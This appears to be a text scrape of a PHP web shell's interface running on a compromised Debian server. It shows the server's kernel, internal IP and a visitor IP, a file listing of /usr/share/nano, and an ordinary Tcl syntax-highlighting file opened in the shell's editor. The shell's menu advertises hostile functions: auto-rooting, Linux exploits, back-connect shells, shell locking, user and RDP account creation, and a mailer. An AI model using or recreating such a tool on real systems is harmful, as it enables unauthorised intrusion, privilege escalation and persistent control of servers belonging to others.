Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nano /
[ HOME SHELL ]
Name
Size
Permission
Action
debian
[ DIR ]
drwxr-xr-x
extra
[ DIR ]
drwxr-xr-x
asm.nanorc
714
B
-rw-r--r--
autoconf.nanorc
635
B
-rw-r--r--
awk.nanorc
1.31
KB
-rw-r--r--
c.nanorc
1.88
KB
-rw-r--r--
changelog.nanorc
790
B
-rw-r--r--
cmake.nanorc
824
B
-rw-r--r--
css.nanorc
485
B
-rw-r--r--
debian.nanorc
801
B
-rw-r--r--
default.nanorc
775
B
-rw-r--r--
elisp.nanorc
1.08
KB
-rw-r--r--
email.nanorc
340
B
-rw-r--r--
go.nanorc
1.41
KB
-rw-r--r--
groff.nanorc
742
B
-rw-r--r--
guile.nanorc
562
B
-rw-r--r--
haskell.nanorc
1009
B
-rw-r--r--
html.nanorc
1.26
KB
-rw-r--r--
java.nanorc
654
B
-rw-r--r--
javascript.nanorc
822
B
-rw-r--r--
json.nanorc
805
B
-rw-r--r--
lua.nanorc
2.4
KB
-rw-r--r--
makefile.nanorc
536
B
-rw-r--r--
man.nanorc
717
B
-rw-r--r--
markdown.nanorc
947
B
-rw-r--r--
nanohelp.nanorc
594
B
-rw-r--r--
nanorc.nanorc
4.22
KB
-rw-r--r--
nftables.nanorc
927
B
-rw-r--r--
objc.nanorc
1.45
KB
-rw-r--r--
ocaml.nanorc
831
B
-rw-r--r--
patch.nanorc
600
B
-rw-r--r--
perl.nanorc
2.07
KB
-rw-r--r--
php.nanorc
1.06
KB
-rw-r--r--
po.nanorc
1.15
KB
-rw-r--r--
python.nanorc
1.37
KB
-rw-r--r--
ruby.nanorc
1.31
KB
-rw-r--r--
rust.nanorc
1.01
KB
-rw-r--r--
sh.nanorc
1.49
KB
-rw-r--r--
sql.nanorc
2.35
KB
-rw-r--r--
tcl.nanorc
2.08
KB
-rw-r--r--
tex.nanorc
199
B
-rw-r--r--
texinfo.nanorc
834
B
-rw-r--r--
xml.nanorc
686
B
-rw-r--r--
yaml.nanorc
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tcl.nanorc
## Syntax highlighting for Tcl and Expect scripts. syntax tcl "\.(tcl|exp)$" magic "Tcl(/Tk)? script" comment "#" # Standard Tcl [info commands]: color green "\<(after|append|array|auto_(execok|import|load(_index)?|qualify)|binary|break)\>" color green "\<(case|catch|cd|clock|close|concat|continue|encoding|eof|error|eval|exec|exit|expr)\>" color green "\<(fblocked|fconfigure|fcopy|file(event)?|flush|for|foreach|format|gets|glob|global|history)\>" color green "\<(if|incr|info|interp|join|lappend|lindex|linsert|list|llength|load|lrange|lreplace|lsearch|lset|lsort)\>" color green "\<(namespace|open|package|pid|puts|pwd|read|regexp|regsub|rename|return)\>" color green "\<(scan|seek|set|socket|source|split|string|subst|switch|tclLog|tell|time|trace)\>" color green "\<(unknown|unset|update|uplevel|upvar|variable|vwait|while)\>" # Basic Tcl subcommands: color green "\<array (anymore|donesearch|exists|get|names|nextelement|set|size|startsearch|statistics|unset)\>" color green "\<string (compare|equal|first|index|is|last|(byte)?length|map|match|range|repeat|replace|to(lower|title|upper)?|trim(left|right)?|will|word(end|start))\>" # Extended TclX [info commands]: color green "\<(alarm|auto_load_pkg|bsearch|cat(close|gets|open)|ccollate|cconcat|cequal|chgrp|chmod|chown|chroot)\>" color green "\<(cindex|clength|cmdtrace|commandloop|crange|csubstr|ctoken|ctype|dup|echo|execl)\>" color green "\<(fcntl|flock|fork|fstat|ftruncate|funlock|host_info|id|infox|keyl(del|get|keys|set)|kill)\>" color green "\<(lassign|lcontain|lempty|lgets|link|lmatch|loadlibindex|loop|lvar(cat|pop|push)|max|min|nice)\>" color green "\<(pipe|profile|random|readdir|replicate|scan(context|file|match)|select|server_(accept|create)|signal)\>" color green "\<(sleep|sync|system|tclx_(findinit|fork|load_tndxs|sleep|system|wait)|times|translit|try_eval|umask|wait)\>" # Syntax: color green "[!$&();<=>\`|]" color brightblue "\<proc[[:blank:]]|\{|\}" color brightyellow ""([^"\]|\\.)*"|'([^'\]|\\.)*'" color brightred "\$\{?[0-9A-Za-z_!@#$*?-]+\}?" # Trailing whitespace: color ,green "[[:space:]]+$" # Comments: color cyan "^[[:blank:]]*#.*"
Close